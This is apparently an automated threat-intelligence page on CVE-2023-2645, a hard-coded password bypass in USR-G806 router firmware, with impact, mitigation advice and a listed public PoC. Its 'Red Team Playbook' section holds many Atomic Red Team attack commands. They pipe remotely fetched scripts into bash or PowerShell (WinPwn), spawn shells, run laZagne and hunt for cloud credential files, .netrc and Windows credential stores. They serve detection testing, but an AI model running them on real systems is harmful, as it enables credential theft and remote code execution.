CVE-2023-2645
Overview
This vulnerability is an authentication bypass caused by the use of a hard-coded password within the Web Management Page component of the USR-G806 firmware version 1.0.41. The flaw arises from improper validation of the username and password parameters, specifically when the input 'root' is supplied, which triggers the acceptance of a fixed credential. This bypass mechanism allows unauthorized access without proper credential verification.
Vulnerability Description
A vulnerability, which was classified as critical, was found in USR USR-G806 1.0.41. Affected is an unknown function of the component Web Management Page. The manipulation of the argument username/password with the input root leads to use of hard-coded password. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. It is recommended to change the configuration settings. VDB-228774 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
Impact
An attacker can remotely gain unauthorized administrative access to the USR-G806 device without any authentication, leveraging the hard-coded password triggered by the 'root' input. This allows full control over device configuration and management, potentially leading to data compromise, device manipulation, or network pivoting. The attack requires only network access to the device's management interface and no user interaction, as indicated by the CVSS vector AV:N/AC:L/PR:N/UI:N/C:H/I:H/A:H.
Solution
No official vendor patch or advisory has been issued as the vendor did not respond to disclosure requests. The only recommended mitigation is to change configuration settings to disable or restrict access to the Web Management Page where possible. Users should monitor the referenced vulnerability ID VDB-228774 on vuldb.com for any future updates or vendor responses and consider isolating the device from untrusted networks until a fix is available.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
A critical vulnerability has been identified in the web management interface of the USR USR-G806 device, specifically in version 1.0.41 of its firmware. The flaw arises from improper handling of user authentication credentials, particularly the username and password fields. An attacker can exploit this vulnerability by manipulating these fields to leverage a hard-coded password, which is embedded within the firmware. This design oversight allows unauthorized users to gain administrative access to the device without needing to know the legitimate credentials. The presence of a hard-coded password significantly weakens the security posture of the device, as it can be easily discovered and exploited by malicious actors.
The primary attack vector for this vulnerability is remote exploitation, which means that an attacker does not need physical access to the device to initiate an attack. By sending crafted requests to the web management interface, an attacker can bypass authentication mechanisms and gain control over the device. This could lead to a variety of malicious activities, including but not limited to unauthorized configuration changes, data exfiltration, or even the deployment of malware. Given the nature of the device, which is likely used in various network environments, the potential for widespread exploitation is significant. Attackers could automate the exploitation process, scanning for vulnerable devices and compromising them en masse.
The real-world impact of this vulnerability is profound, particularly for organizations relying on the USR USR-G806 for network management or connectivity. Unauthorized access to the device could result in severe business risks, including disruption of services, unauthorized data access, and potential regulatory non-compliance if sensitive information is exposed. The financial implications could be substantial, not only from the costs associated with incident response and recovery but also from potential legal liabilities and reputational damage. Moreover, if the device is part of a larger network infrastructure, the compromise could serve as a foothold for further attacks, leading to a cascading effect on other connected systems.
To effectively detect and mitigate this vulnerability, organizations should prioritize immediate action. First, they should assess their inventory to identify any instances of the USR-G806 device running the affected firmware version. Regular vulnerability scanning and penetration testing can help in identifying such weaknesses before they can be exploited. Additionally, organizations should implement network segmentation to limit the exposure of critical devices to the internet and enforce strict access controls. Changing the default configuration settings, particularly those related to authentication, is essential. If possible, organizations should consider upgrading to a more secure firmware version or replacing the device altogether if the vendor does not provide timely patches or support.
In conclusion, the critical vulnerability in the USR USR-G806 firmware underscores the importance of robust security practices in device management. Organizations must remain vigilant and proactive in their cybersecurity efforts, particularly in the face of known vulnerabilities. By implementing comprehensive detection and mitigation strategies, they can significantly reduce the risk posed by such vulnerabilities and protect their networks from potential exploitation. The lack of vendor responsiveness further emphasizes the need for organizations to take ownership of their security posture and not solely rely on manufacturers for timely updates and support.
CSURFACE threat intelligence has identified a marked escalation in the exploitability potential of CVE-2023-2645, as evidenced by a substantial increase in the Exploit Prediction Scoring System (EPSS) score. This upward shift reflects growing confidence in the vulnerability’s practical use within attacker toolkits, likely driven by the recent public availability of proof-of-concept exploits targeting the USR-G806 device. Our telemetry indicates a steady upward trend in interest and potential exploitation attempts, underscoring that threat actors are increasingly prioritizing this vector. While the rapid increase has not yet accelerated to a critical surge, the vulnerability’s critical severity combined with expanding exploitability elevates the overall threat posture. Defenders should recognize that the window for opportunistic exploitation is widening, increasing the urgency for detection and monitoring efforts focused on this vulnerability. The evolving landscape suggests that adversaries may integrate this exploit more broadly into automated attacks or targeted campaigns, thereby amplifying risk to affected environments.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Usr | Usr-G806 Firmware | 1.0.41 |
cpe:2.3:o:usr:usr-g806_firmware:1.0.41:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
GitHub PoCs (1)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
xymbiot-solution/CVE-2023-2645
Backdoor Industrial Internet of Things GSM Modem
|
xymbiot-solution | 0 | 0 | 2025-01-07 | View |
Threat Feed
1 eventsProof-of-concept code is publicly available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns
No CAPEC pattern mapped to this CVE.
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (4)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2023-2645 |
| vuldb.com |
GitHub CVE
vdb-entry
technical-description
|
https://vuldb.com/?id.228774 |
| vuldb.com |
GitHub CVE
signature
permissions-required
|
https://vuldb.com/?ctiid.228774 |
| github.com |
GitHub CVE
exploit
|
https://github.com/wswokao/testrouter/blob/main/README.md |